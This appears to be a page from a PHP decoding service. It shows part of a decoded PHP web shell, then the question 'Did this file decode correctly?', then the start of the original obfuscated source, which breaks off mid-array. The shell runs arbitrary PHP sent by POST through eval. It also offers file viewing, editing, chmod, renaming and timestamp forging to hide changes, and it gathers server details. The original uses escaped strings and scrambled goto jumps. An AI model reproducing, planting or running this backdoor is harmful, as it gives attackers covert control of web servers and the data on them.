fclose($fp); } } die; } if (@$_POST["wat"] == "mkfile") { if (!file_exists($_POST["vat"])) { $fp = @fopen($_POST["vat"], "w"); if ($fp) { $_POST["wat"] = "edit"; fclose($fp); } } } beer_Header(); echo "<h1>File tools</h1><div class=content>"; if (!file_exists(@$_POST["vat"])) { echo "File not exists"; beer_Footer(); return; } $uid = @posix_getpwuid(@fileowner($_POST["vat"])); if (!$uid) { $uid["name"] = @fileowner($_POST["vat"]); $gid["name"] = @filegroup($_POST["vat"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["vat"])); } echo "<span>Name:</span> " . htmlspecialchars(@basename($_POST["vat"])) . " <span>Size:</span> " . (is_file($_POST["vat"]) ? beer_ViewSize(filesize($_POST["vat"])) : "-") . " <span>Permission:</span> " . beer_PermsColor($_POST["vat"]) . " <span>Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . "<br>"; echo "<span>Change time:</span> " . date("Y-m-d H:i:s", filectime($_POST["vat"])) . " <span>Access time:</span> " . date("Y-m-d H:i:s", fileatime($_POST["vat"])) . " <span>Modify time:</span> " . date("Y-m-d H:i:s", filemtime($_POST["vat"])) . "<br><br>"; if (empty($_POST["wat"])) { $_POST["wat"] = "view"; } if (is_file($_POST["vat"])) { $m = array("View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch"); } else { $m = array("Chmod", "Rename", "Touch"); } foreach ($m as $v) { echo "<a href=# onclick="g(null,null,'" . urlencode($_POST["vat"]) . "','" . strtolower($v) . "')">" . (strtolower($v) == @$_POST["wat"] ? "<b>[ " . $v . " ]</b>" : $v) . "</a> "; } echo "<br><br>"; switch ($_POST["wat"]) { case "view": echo "<pre class=ml1>"; $fp = @fopen($_POST["vat"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</pre>"; break; case "highlight": if (@is_readable($_POST["vat"])) { echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">"; $code = @highlight_file($_POST["vat"], true); echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $code) . "</div>"; } break; case "chmod": if (!empty($_POST["xat"])) { $perms = 0; for ($i = strlen($_POST["xat"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["xat"][$i] * pow(8, strlen($_POST["xat"]) - $i - 1); } if (!@chmod($_POST["vat"], $perms)) { echo "Can't set permissions!<br><script>document.mf.xat.value="";</script>"; } } clearstatcache(); echo "<script>xat_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["vat"]) . "',null,this.chmod.value);return false;"><input type=text name=chmod value="" . substr(sprintf("%o", fileperms($_POST["vat"])), -4) . ""><input type=submit value=">>"></form>"; break; case "edit": if (!is_writable($_POST["vat"])) { echo "File isn't writeable"; break; } if (!empty($_POST["xat"])) { $time = @filemtime($_POST["vat"]); $_POST["xat"] = substr($_POST["xat"], 1); $fp = @fopen($_POST["vat"], "w"); if ($fp) { @fwrite($fp, $_POST["xat"]); @fclose($fp); echo "Saved!<br><script>xat_="";</script>"; @touch($_POST["vat"], $time, $time); } } echo "<form onsubmit="g(null,null,'" . urlencode($_POST["vat"]) . "',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>"; $fp = @fopen($_POST["vat"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</textarea><input type=submit value=">>"></form>"; break; case "hexdump": $c = @file_get_contents($_POST["vat"]); $n = 0; $h = array("00000000<br>", '', ''); $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } $h[1] .= "<br>"; $h[2] .= "\xa"; } } echo "<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#282828><pre>" . $h[1] . "</pre></td><td bgcolor=#333333><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table>"; break; case "rename": if (!empty($_POST["xat"])) { if (!@rename($_POST["vat"], $_POST["xat"])) { echo "Can't rename!<br>"; } else { die("<script>g(null,null,"" . urlencode($_POST["xat"]) . "",null,"")</script>"); } } echo "<form onsubmit="g(null,null,'" . urlencode($_POST["vat"]) . "',null,this.name.value);return false;"><input type=text name=name value="" . htmlspecialchars($_POST["vat"]) . ""><input type=submit value=">>"></form>"; break; case "touch": if (!empty($_POST["xat"])) { $time = strtotime($_POST["xat"]); if ($time) { if (!touch($_POST["vat"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } clearstatcache(); echo "<script>xat_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["vat"]) . "',null,this.touch.value);return false;"><input type=text name=touch value="" . date("Y-m-d H:i:s", @filemtime($_POST["vat"])) . ""><input type=submit value=">>"></form>"; break; } echo "</div>"; beer_Footer(); } goto vPQjc; XRmTa: function BEER_setcookie($k, $v) { $_COOKIE[$k] = $v; if ($k == "act") { $v = base64_encode($v); } setcookie($k, $v); } goto YH0Lz; pOK6k: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto DucCl; cFBhY: if (!empty($_POST["act"]) && function_exists("action" . $_POST["act"])) { call_user_func("action" . $_POST["act"]); } goto rgPx2; rgPx2: die; ?>

Did this file decode correctly?

Original Code

<?php
 goto I0hyB; w9Sjf: function actionPhp() { if (isset($_POST["\141\x6a\141\x78"])) { BEER_setcookie(md5($_SERVER["\x48\x54\124\120\137\x48\117\123\124"]) . "\141\x6a\141\170", true); ob_start(); eval($_POST["\x76\141\x74"]); $temp = "\x64\x6f\x63\x75\155\145\156\x74\56\x67\x65\164\x45\154\x65\x6d\145\156\164\102\x79\x49\x64\50\47\x50\150\x70\x4f\x75\164\160\165\164\47\x29\56\163\x74\171\154\145\x2e\x64\x69\163\x70\154\141\171\75\47\x27\x3b\x64\157\x63\165\155\145\156\x74\x2e\x67\x65\164\x45\154\145\x6d\x65\156\164\x42\171\x49\144\x28\x27\120\150\160\117\165\164\x70\x75\x74\x27\51\56\x69\x6e\156\x65\x72\110\x54\115\114\75\47" . addcslashes(htmlspecialchars(ob_get_clean()), "\12\xa\x9\134\x27\40") . "\47\73\xa"; echo strlen($temp), "\12", $temp; die; } if (empty($_POST["\x61\152\x61\170"]) && !empty($_POST["\x76\141\164"])) { BEER_setcookie(md5($_SERVER["\x48\124\x54\x50\137\x48\117\123\x54"]) . "\141\152\x61\x78", 0); } beer_Header(); if (isset($_POST["\x77\x61\x74"]) && $_POST["\167\x61\164"] == "\151\156\x66\157") { echo "\74\x68\x31\76\120\110\120\40\151\x6e\x66\x6f\74\x2f\150\x31\x3e\74\144\x69\166\40\x63\x6c\x61\163\163\x3d\x63\x6f\156\x74\145\156\x74\76\74\x73\164\x79\154\x65\76\x2e\160\x20\173\143\157\x6c\x6f\x72\x3a\x23\60\60\x30\73\175\x3c\57\x73\164\171\154\145\76"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(array("\41\x28\142\x6f\144\171\174\x61\72\x5c\167\x2b\174\x62\x6f\x64\171\x2c\x20\164\144\x2c\x20\x74\150\54\40\x68\61\54\x20\x68\62\x29\x20\x7b\x2e\52\x7d\x21\x6d\163\x69\125", "\41\164\x64\54\40\x74\x68\40\173\x28\56\x2a\x29\175\41\x6d\x73\x69\x55", "\x21\x3c\x69\155\147\x5b\136\76\135\x2b\x3e\41\155\x73\x69\125"), array('', "\x2e\x65\54\40\x2e\166\54\x20\56\x68\54\40\x2e\x68\x20\164\x68\x20\x7b\44\61\175", ''), $tmp); echo str_replace("\x3c\x68\61", "\x3c\150\x32", $tmp) . "\74\57\x64\x69\166\x3e\x3c\x62\x72\76"; } echo "\x3c\x68\x31\76\x45\x78\145\143\165\164\x69\157\156\x20\x50\110\120\55\143\157\144\145\74\57\150\x31\x3e\x3c\144\151\166\x20\x63\154\141\x73\163\x3d\x63\x6f\x6e\164\145\156\164\76\74\146\x6f\x72\x6d\x20\x6e\x61\155\x65\x3d\x70\x66\x20\x6d\x65\164\x68\157\x64\75\x70\x6f\x73\164\40\x6f\x6e\163\x75\x62\155\x69\164\x3d\x22\x69\x66\x28\x74\x68\151\x73\56\x61\x6a\141\x78\56\x63\150\145\143\x6b\x65\144\x29\173\141\50\47\120\150\x70\x27\x2c\x6e\x75\154\154\x2c\164\150\x69\x73\x2e\x63\157\x64\x65\x2e\x76\141\154\x75\x65\x29\73\x7d\145\x6c\x73\145\173\x67\50\x27\x50\150\x70\47\x2c\x6e\165\x6c\154\54\x74\x68\x69\163\56\143\157\144\145\x2e\166\x61\x6c\165\145\x2c\47\47\51\73\175\162\x65\x74\x75\x72\156\40\146\x61\154\x73\145\73\x22\76\x3c\164\145\x78\x74\x61\x72\x65\141\x20\156\x61\x6d\x65\x3d\x63\157\x64\x65\x20\x63\x6c\x61\163\x73\75\142\151\147\141\162\x65\141\40\151\x64\x3d\120\x68\160\x43\x6f\x64\x65\76" . (!empty($_POST["\166\x61\x74"]) ? htmlspecialchars($_POST["\x76\141\164"]) : '') . "\x3c\x2f\164\145\x78\x74\x61\x72\x65\141\x3e\x3c\151\156\x70\165\x74\40\x74\x79\x70\145\75\163\165\x62\155\x69\164\40\166\141\x6c\165\x65\75\105\x76\141\154\40\x73\164\171\154\x65\x3d\x22\x6d\141\x72\147\x69\x6e\x2d\164\157\x70\x3a\65\x70\x78\x22\76"; echo "\40\74\151\x6e\160\165\164\40\x74\171\x70\145\x3d\143\x68\145\143\153\142\x6f\x78\40\156\141\x6d\x65\75\x61\x6a\x61\170\40\x76\x61\x6c\x75\145\75\61\x20" . ($_COOKIE[md5($_SERVER["\110\x54\124\x50\x5f\110\117\x53\x54"]) . "\x61\152\141\170"] ? "\x63\150\145\x63\153\145\x64" : '') . "\76\40\x73\145\x6e\144\x20\165\163\x69\x6e\147\40\101\112\x41\x58\x3c\x2f\x66\x6f\162\x6d\76\74\160\x72\145\x20\151\144\x3d\120\x68\x70\x4f\165\x74\160\165\164\40\163\164\x79\x6c\145\x3d\42" . (empty($_POST["\x76\141\x74"]) ? "\144\151\163\160\154\141\x79\x3a\x6e\157\x6e\x65\73" : '') . "\x6d\141\162\x67\x69\x6e\x2d\x74\157\160\x3a\65\160\170\73\42\40\143\x6c\x61\163\x73\75\155\154\x31\x3e"; if (!empty($_POST["\166\141\164"])) { ob_start(); eval($_POST["\x76\x61\164"]); echo htmlspecialchars(ob_get_clean()); } echo "\x3c\x2f\x70\x72\x65\76\x3c\57\x64\x69\166\76"; beer_Footer(); } goto brDO3; DucCl: $safe_mode = @ini_get("\163\x61\x66\x65\137\155\157\144\145"); goto ZQ7ZC; ieWhI: function beer_Header() { if (empty($_POST["\x63\163\x65\x74"])) { $_POST["\143\163\x65\164"] = $GLOBALS["\x64\145\146\141\165\154\164\x5f\x63\163\145\x74"]; } echo "\74\x68\164\x6d\154\x3e\74\x68\x65\141\x64\x3e\74\155\145\164\141\40\x68\x74\x74\160\x2d\145\161\165\151\166\x3d\x27\103\157\x6e\164\x65\x6e\x74\x2d\x54\171\160\145\47\x20\x63\x6f\156\164\x65\x6e\164\75\x27\164\145\x78\164\57\150\164\155\154\73\x20\143\x73\x65\164\x3d" . $_POST["\x63\163\145\164"] . "\47\76\74\164\151\x74\154\145\76" . $_SERVER["\110\x54\124\120\x5f\x48\117\x53\x54"] . "\74\x2f\x74\x69\164\x6c\145\76\xa\x3c\163\164\171\x6c\x65\76\12\x62\157\x64\171\173\x62\x61\143\x6b\147\x72\x6f\x75\x6e\x64\x2d\x63\x6f\154\157\x72\72\43\64\x34\64\x3b\143\157\154\157\162\72\43\x65\x31\145\61\x65\x31\x3b\x7d\xa\x62\x6f\144\171\54\x74\144\54\x74\x68\173\40\x66\x6f\156\x74\x3a\40\71\x70\x74\40\114\x75\143\151\x64\x61\54\x56\x65\x72\144\x61\x6e\141\x3b\155\141\162\x67\151\156\x3a\x30\73\166\145\162\164\151\143\x61\x6c\x2d\141\x6c\151\x67\156\72\x74\157\x70\x3b\x63\157\154\x6f\162\x3a\x23\x65\61\145\61\145\61\x3b\x20\x7d\12\164\141\x62\x6c\x65\x2e\x69\x6e\146\157\173\40\143\x6f\154\157\x72\72\43\146\146\x66\73\x62\141\x63\153\x67\162\157\x75\x6e\144\x2d\x63\x6f\154\157\162\72\43\x32\x32\62\x3b\40\x7d\xa\x73\x70\x61\x6e\x2c\150\61\x2c\x61\173\40\x63\157\154\157\162\x3a\40\x23\x64\146\x36\x20\x21\151\155\x70\x6f\x72\164\x61\156\x74\x3b\40\x7d\12\x73\x70\x61\x6e\173\40\146\x6f\156\x74\x2d\x77\x65\151\147\150\164\72\40\142\157\x6c\x64\x65\x72\x3b\40\175\xa\x68\61\x7b\x20\142\157\x72\x64\145\x72\55\154\x65\x66\164\72\x35\x70\x78\x20\163\x6f\x6c\151\x64\40\43\144\x66\66\73\x70\x61\x64\x64\x69\x6e\147\x3a\40\x32\x70\170\40\65\x70\x78\73\x66\157\x6e\x74\72\x20\61\x34\x70\x74\40\126\145\162\x64\x61\x6e\141\x3b\x62\141\x63\x6b\147\162\x6f\165\x6e\x64\x2d\x63\x6f\154\x6f\162\72\43\x32\62\x32\x3b\155\141\x72\147\x69\156\72\60\160\170\x3b\x20\x7d\xa\144\x69\166\56\143\157\156\x74\x65\156\164\173\40\160\141\144\x64\151\156\x67\72\x20\x35\160\170\x3b\x6d\141\x72\x67\x69\x6e\55\154\145\x66\164\x3a\x35\x70\170\73\x62\141\143\153\147\162\x6f\165\x6e\144\x2d\143\157\x6c\157\x72\72\x23\x33\63\x33\x3b\x20\x7d\12\141\x7b\40\164\145\x78\x74\x2d\x64\145\143\x6f\162\x61\164\151\x6f\x6e\72\156\x6f\x6e\x65\x3b\40\x7d\xa\141\72\150\157\166\x65\x72\x7b\x20\x74\x65\x78\x74\x2d\x64\145\143\x6f\x72\x61\x74\151\x6f\x6e\72\x75\156\144\x65\x72\154\x69\x6e\145\73\x20\175\12\x2e\x6d\x6c\x31\x7b\x20\x62\x6f\162\144\x65\x72\x3a\61\x70\x78\x20\x73\157\154\x69\144\x20\43\64\64\x34\73\x70\x61\x64\x64\151\156\x67\72\65\x70\x78\73\x6d\141\x72\147\151\156\72\x30\x3b\157\x76\x65\x72\146\x6c\x6f\167\72\x20\141\165\x74\x6f\x3b\x20\175\12\56\142\151\147\141\162\145\x61\x7b\x20\167\151\144\164\150\x3a\61\60\60\45\x3b\150\x65\151\147\150\164\x3a\x33\x30\x30\x70\x78\x3b\x20\175\xa\151\156\x70\x75\164\54\x74\145\x78\164\141\x72\x65\x61\54\x73\x65\154\145\143\164\x7b\x20\155\x61\x72\x67\151\x6e\x3a\60\73\143\x6f\154\157\x72\x3a\x23\146\x66\x66\x3b\142\x61\143\153\x67\162\x6f\165\156\x64\x2d\x63\157\x6c\157\162\72\43\65\65\65\x3b\x62\x6f\x72\x64\x65\162\72\x31\x70\170\x20\x73\157\154\151\144\x20\x23\144\x66\x36\73\40\x66\157\x6e\x74\72\40\71\x70\x74\x20\115\x6f\156\157\163\x70\141\x63\x65\x2c\x27\x43\157\165\x72\151\145\162\40\116\145\x77\x27\x3b\x20\175\xa\146\x6f\162\155\173\x20\155\141\162\x67\x69\156\x3a\x30\160\x78\73\40\175\12\43\x74\x6f\157\154\163\x54\x62\x6c\173\x20\x74\x65\x78\x74\x2d\x61\154\x69\147\156\72\x63\x65\x6e\x74\145\162\73\40\175\12\x2e\x74\x6f\157\154\x73\111\156\x70\x7b\x20\x77\x69\144\x74\150\x3a\x20\63\60\60\160\x78\40\175\12\56\x6d\x61\151\156\x20\164\x68\173\x74\x65\x78\x74\55\141\154\x69\147\156\x3a\x6c\x65\x66\164\73\x62\x61\143\153\x67\162\157\165\156\x64\x2d\143\157\154\157\162\x3a\43\x35\x65\x35\x65\x35\x65\x3b\175\xa\56\155\x61\x69\156\x20\x74\162\72\x68\x6f\x76\145\162\x7b\142\141\143\x6b\x67\x72\157\165\156\144\55\x63\157\x6c\157\x72\72\x23\x35\x65\x35\x65\65\145\175\12\56\154\61\173\x62\141\x63\153\147\162\157\165\156\x64\55\x63\157\154\x6f\162\x3a\43\64\x34\64\x7d\12\56\x6c\62\x7b\142\141\143\153\147\x72\x6f\165\156\144\55\x63\157\154\x6f\x72\x3a\x23\x33\x33\x33\175\xa\160\162\x65\173\146\x6f\156\x74\55\x66\141\x6d\x69\154\171\72\103\x6f\165\162\x69\x65\162\54\115\x6f\156\x6f\163\160\x61\x63\x65\x3b\x7d\xa\74\x2f\x73\x74\171\154\x65\x3e\12\74\163\143\162\151\x70\x74\76\12\40\40\40\40\166\x61\162\x20\x63\x5f\x20\75\x20\x27" . htmlspecialchars($GLOBALS["\143\x77\x64"]) . "\47\x3b\12\x20\x20\x20\x20\x76\x61\x72\40\x61\x5f\x20\x3d\40\47" . htmlspecialchars(@$_POST["\x61\x63\x74"]) . "\47\xa\x20\x20\x20\x20\166\x61\x72\x20\x63\163\145\x74\137\40\75\40\x27" . htmlspecialchars(@$_POST["\143\x73\x65\x74"]) . "\47\73\xa\40\x20\40\x20\x76\x61\162\x20\166\x61\x74\137\x20\x3d\x20\47" . (strpos(@$_POST["\x76\141\164"], "\12") !== false ? '' : htmlspecialchars($_POST["\x76\141\x74"], ENT_QUOTES)) . "\x27\73\xa\40\x20\x20\x20\166\x61\x72\40\167\x61\164\137\40\x3d\40\x27" . (strpos(@$_POST["\x77\x61\x74"], "\xa") !== false ? '' : htmlspecialchars($_POST["\x77\x61\x74"], ENT_QUOTES)) . "\x27\x3b\xa\40\40\40\x20\166\141\x72\x20\x78\x61\164\x5f\40\75\x20\47" . (strpos(@$_POST["\170\x61\164"], "\12") !== false ? '' : htmlspecialchars($_POST["\x78\x61\x74"], ENT_QUOTES)) . "\47\73\xa\x20\x20\40\x20\166\x61\x72\x20\x64\x20\75\x20\144\x6f\143\165\155\x65\156\x74\x3b\xa\11\146\x75\x6e\x63\x74\151\157\x6e\40\x73\145\x74\50\141\54\143\54\x76\141\164\x2c\x77\x61\x74\x2c\x78\x61\164\54\143\x73\145\x74\x29\40\x7b\12\11\11\151\x66\50\141\x21\75\x6e\165\x6c\154\51\x64\x2e\155\x66\56\x61\143\x74\x2e\x76\141\154\165\x65\75\142\x74\157\141\50\x61\x29\x3b\x65\x6c\163\145\x20\144\56\155\x66\x2e\141\143\164\56\166\141\154\x75\x65\x3d\x62\164\x6f\141\x28\141\x5f\x29\73\12\x9\x9\151\146\50\x63\x21\75\156\x75\154\154\x29\144\x2e\155\146\x2e\x63\x61\164\56\166\x61\x6c\165\145\x3d\142\164\x6f\x61\x28\x63\51\73\145\154\x73\145\40\144\x2e\155\146\x2e\x63\141\x74\x2e\x76\x61\154\x75\x65\x3d\x62\x74\157\141\50\x63\137\x29\x3b\xa\x9\11\x69\146\50\x76\141\x74\41\x3d\156\165\x6c\154\x29\x64\56\155\x66\56\166\x61\164\56\x76\141\154\165\145\75\142\x74\x6f\141\x28\166\x61\164\x29\73\145\x6c\x73\145\x20\144\x2e\155\146\x2e\166\141\x74\56\x76\141\154\x75\145\x3d\x62\x74\157\x61\50\166\141\164\x5f\51\x3b\12\11\x9\x69\146\50\167\x61\164\x21\75\x6e\x75\x6c\154\x29\x64\56\155\x66\56\x77\x61\x74\x2e\x76\x61\154\165\x65\75\x62\164\x6f\141\50\x77\x61\x74\51\x3b\145\154\163\145\40\144\x2e\x6d\x66\x2e\x77\x61\164\x2e\166\141\x6c\165\x65\x3d\142\x74\157\141\50\167\141\x74\137\51\73\xa\11\11\x69\146\50\170\141\164\x21\75\x6e\x75\154\x6c\51\x64\x2e\155\146\x2e\170\x61\x74\x2e\166\141\x6c\x75\145\x3d\142\164\x6f\x61\50\x78\141\x74\51\73\x65\x6c\x73\145\x20\x64\x2e\x6d\x66\x2e\170\x61\164\x2e\166\x61\x6c\165\145\75\x62\164\157\141\50\170\141\x74\137\51\x3b\xa\x9\x9\x69\x66\x28\143\x73\145\x74\x21\x3d\x6e\x75\154\x6c\51\144\56\155\146\x2e\x63\x73\x65\x74\56\166\141\x6c\165\145\75\x62\x74\x6f\x61\50\143\163\145\164\x29\73\145\x6c\x73\145\40\x64\x2e\155\x66\x2e\143\163\x65\x74\x2e\166\x61\154\x75\145\x3d\x62\x74\x6f\141\x28\x63\x73\145\164\x5f\51\x3b\xa\11\x7d\xa\x9\146\165\x6e\x63\164\151\157\156\40\x67\50\x61\x2c\143\54\166\141\x74\54\167\141\x74\x2c\x78\x61\164\x2c\x63\x73\x65\x74\x29\x20\x7b\12\x9\11\163\145\x74\x28\x61\54\x63\x2c\x76\x61\164\x2c\167\141\x74\x2c\170\141\x74\x2c\x63\163\x65\164\51\73\12\x9\11\144\x2e\155\146\56\x73\165\x62\x6d\151\164\x28\51\x3b\xa\11\x7d\12\x9\146\x75\x6e\x63\164\151\x6f\156\x20\x61\x28\141\x2c\x63\x2c\166\x61\164\x2c\167\141\164\54\170\141\164\54\x63\x73\145\164\x29\40\173\12\11\11\163\145\x74\x28\141\x2c\x63\x2c\x76\141\164\x2c\167\x61\164\x2c\x78\141\164\x2c\143\x73\x65\164\51\x3b\xa\11\x9\x76\x61\x72\40\160\x61\162\x61\x6d\x73\x20\75\40\47\x61\152\x61\170\x3d\x74\x72\x75\x65\x27\x3b\12\11\11\x66\x6f\162\50\x69\75\60\x3b\151\74\x64\56\x6d\x66\x2e\x65\x6c\x65\155\145\x6e\164\x73\56\154\145\156\147\x74\x68\73\151\x2b\53\x29\12\x9\x9\11\x70\141\162\x61\155\x73\x20\x2b\75\x20\x27\46\47\53\144\x2e\155\x66\x2e\145\x6c\x65\x6d\145\156\164\163\133\151\135\56\x6e\141\155\x65\53\47\75\x27\53\145\x6e\143\157\144\145\125\122\111\x43\157\x6d\160\157\156\145\156\x74\x28\x64\56\x6d\146\x2e\x65\x6c\x65\155\x65\156\x74\163\133\151\x5d\x2e\166\141\154\165\x65\x29\x3b\12\x9\x9\x73\x72\x28\47" . addslashes($_SERVER["\x52\105\x51\x55\105\x53\124\137\125\x52\111"]) . "\47\x2c\x20\x70\141\x72\x61\155\x73\x29\x3b\12\11\x7d\xa\11\x66\x75\156\x63\164\x69\157\156\40\163\162\x28\x75\162\x6c\x2c\40\160\x61\162\x61\155\163\x29\40\x7b\xa\x9\x9\x69\146\40\50\x77\x69\x6e\144\157\167\x2e\130\x4d\x4c\110\164\164\160\122\145\x71\165\145\163\164\x29\xa\x9\x9\11\162\145\161\x20\x3d\x20\x6e\x65\167\40\130\x4d\114\110\164\x74\x70\122\x65\x71\x75\x65\163\164\50\51\x3b\xa\11\x9\x65\154\x73\x65\40\x69\x66\x20\x28\x77\x69\156\x64\x6f\x77\x2e\x41\143\x74\x69\x76\x65\130\x4f\x62\152\145\143\x74\51\12\x9\11\11\162\145\x71\40\75\x20\156\x65\x77\40\x41\x63\x74\151\x76\145\x58\117\x62\x6a\145\x63\x74\50\47\x4d\151\143\162\157\163\157\x66\x74\56\130\115\x4c\110\x54\124\120\47\x29\73\12\40\x20\x20\40\40\x20\40\40\151\x66\40\50\162\x65\x71\x29\x20\x7b\12\40\40\x20\x20\40\x20\40\x20\x20\x20\40\x20\x72\x65\161\56\x6f\x6e\162\145\x61\x64\x79\x73\164\141\x74\x65\x63\150\x61\156\147\x65\40\x3d\x20\x70\162\157\x63\x65\163\x73\122\x65\161\103\150\x61\x6e\147\x65\x3b\12\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\40\x72\x65\161\x2e\x6f\x70\145\x6e\x28\x27\x50\x4f\x53\124\x27\54\40\165\x72\x6c\x2c\40\x74\162\165\145\51\73\12\40\40\x20\40\40\40\40\x20\x20\40\40\x20\162\x65\x71\x2e\163\145\164\122\x65\x71\165\145\163\x74\x48\x65\x61\144\145\162\40\x28\x27\103\157\x6e\164\145\x6e\164\55\x54\x79\160\145\47\54\40\47\x61\x70\x70\154\x69\143\141\x74\x69\x6f\x6e\x2f\170\55\167\167\x77\x2d\x66\x6f\x72\155\x2d\x75\162\154\x65\156\x63\x6f\144\x65\144\47\x29\x3b\xa\x20\x20\40\x20\x20\x20\40\x20\40\x20\40\40\162\x65\161\56\163\145\156\x64\x28\160\141\162\141\155\163\51\x3b\xa\40\x20\40\x20\40\x20\x20\x20\x7d\12\11\x7d\xa\x9\146\x75\x6e\143\x74\151\x6f\x6e\40\160\162\x6f\x63\145\x73\163\122\145\161\103\x68\141\156\147\x65\x28\x29\x20\173\12\11\x9\151\146\x28\40\50\x72\145\x71\x2e\x72\x65\141\144\x79\x53\164\x61\164\x65\x20\75\75\x20\64\51\40\x29\xa\11\11\11\x69\x66\x28\x72\145\161\56\x73\x74\x61\x74\x75\x73\x20\75\x3d\40\x32\60\60\x29\40\x7b\12\11\11\x9\x9\166\141\x72\40\162\x65\x67\40\75\40\156\145\167\40\x52\145\x67\105\170\160\50\42\50\x5c\x64\53\51\x28\133\x5c\123\x5c\x73\135\x2a\x29\42\54\x20\x27\x6d\47\x29\x3b\12\11\11\11\11\x76\141\162\40\x61\x72\162\x3d\162\145\x67\56\x65\170\x65\x63\50\162\145\161\56\162\145\163\160\x6f\x6e\163\145\124\145\x78\164\x29\x3b\xa\x9\x9\11\11\x65\x76\141\154\50\x61\x72\x72\x5b\62\x5d\x2e\163\165\x62\163\164\x72\x28\60\54\40\141\162\x72\133\61\x5d\51\51\x3b\xa\x9\x9\11\x7d\40\145\154\163\145\40\141\154\145\162\164\x28\47\x52\145\161\x75\145\163\164\40\145\x72\x72\157\x72\x21\47\51\73\12\11\x7d\12\x3c\x2f\163\x63\x72\151\160\x74\x3e\xa\x3c\150\145\141\144\76\74\x62\157\x64\171\76\x3c\144\151\166\x20\163\x74\171\154\x65\x3d\x27\x70\x6f\163\151\164\151\157\x6e\x3a\x61\x62\x73\x6f\x6c\x75\x74\145\x3b\x77\x69\144\x74\x68\72\x31\60\x30\x25\x3b\x62\141\x63\153\147\x72\157\165\x6e\x64\55\x63\157\x6c\157\x72\x3a\43\x34\64\x34\x3b\164\157\x70\72\x30\x3b\154\x65\146\164\x3a\x30\x3b\x27\x3e\xa\74\x66\x6f\x72\x6d\x20\155\x65\x74\x68\157\x64\x3d\x70\x6f\163\x74\x20\x6e\x61\155\x65\x3d\155\x66\40\163\164\x79\x6c\x65\75\x27\x64\x69\163\160\154\141\x79\x3a\156\157\x6e\x65\73\x27\76\12\x3c\x69\156\x70\165\164\x20\164\x79\160\x65\x3d\150\151\x64\144\x65\156\40\x6e\x61\155\145\x3d\x61\x63\164\76\12\x3c\x69\156\160\x75\164\x20\x74\171\160\x65\75\150\x69\144\144\x65\156\x20\x6e\x61\155\x65\75\x63\x61\x74\76\12\74\151\156\160\x75\x74\x20\x74\171\x70\x65\75\x68\x69\144\144\x65\x6e\x20\156\x61\x6d\x65\75\x76\x61\164\76\12\74\151\x6e\x70\x75\164\40\x74\x79\x70\145\75\150\x69\x64\144\x65\156\x20\x6e\x61\155\x65\75\x77\141\164\76\12\74\x69\156\160\165\164\x20\164\x79\x70\x65\x3d\150\151\x64\144\x65\156\40\x6e\141\155\145\x3d\170\141\x74\76\12\74\x69\x6e\160\x75\164\x20\x74\x79\x70\x65\75\x68\x69\x64\144\x65\156\x20\156\141\x6d\145\x3d\x63\163\x65\164\x3e\12\74\151\156\x70\165\164\x20\x74\171\160\x65\75\x68\x69\x64\144\145\156\40\156\141\155\145\75\x6e\141\x6d\x69\x6e\x67\76\12\74\57\146\157\x72\155\x3e"; $freeSpace = @diskfreespace($GLOBALS["\x63\x77\x64"]); $totalSpace = @disk_total_space($GLOBALS["\143\x77\144"]); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname("\162"); $kernel = @php_uname("\163"); if (!function_exists("\160\x6f\163\x69\x78\x5f\147\145\164\x65\147\151\144")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "\x3f"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["\x6e\141\155\145"]; $uid = $uid["\165\x69\x64"]; $group = $gid["\156\x61\x6d\145"]; $gid = $gid["\x67\x69\144"]; } $cwd_links = ''; $path = explode("\57", $GLOBALS["\143\167\x64"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "\74\x61\40\150\x72\x65\146\75\47\43\47\x20\157\x6e\x63\x6c\x69\x63\153\x3d\47\147\50\x22\x46\x69\154\145\163\x4d\x61\x6e\x22\54\42"; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "\57"; } $cwd_links .= "\x22\x29\x27\76" . $path[$i] . "\x2f\x3c\x2f\x61\x3e"; } $csets = array("\125\x54\x46\55\70", "\x57\x69\156\144\157\167\x73\55\x31\62\65\61", "\x4b\117\111\x38\55\x52", "\x4b\x4f\111\70\x2d\125", "\143\160\70\66\x36"); $opt_csets = ''; foreach ($csets as $item) { $opt_csets .= "\74\x6f\160\x74\x69\157\156\x20\166\x61\154\x75\145\x3d\x22" . $item . "\42\40" . ($_POST["\143\x73\x65\164"] == $item ? "\163\145\154\145\x63\x74\145\x64" : '') . "\76" . $item . "\74\57\x6f\x70\164\x69\157\156\x3e"; } $m = array("\123\x65\x63\56\x20\x49\x6e\146\157" => "\x53\145\x63\x49\156\146\157", "\x46\151\154\145\163" => 